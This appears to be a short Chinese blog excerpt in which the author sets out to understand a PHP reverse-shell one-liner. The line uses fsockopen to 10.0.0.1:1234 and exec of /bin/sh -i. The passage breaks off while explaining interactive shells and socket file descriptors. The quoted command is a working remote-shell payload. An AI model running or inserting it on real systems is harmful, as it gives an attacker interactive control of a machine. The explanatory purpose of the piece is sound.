一条命令引起的思考

这条命令是php php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 做用是反弹一个交互式的shell 代码看得不太懂,因此颇有必要了解一下。shell -i interactive Force the shell to behave interactively.socket 文件描述符,内核(ker
相关文章
相关标签/搜索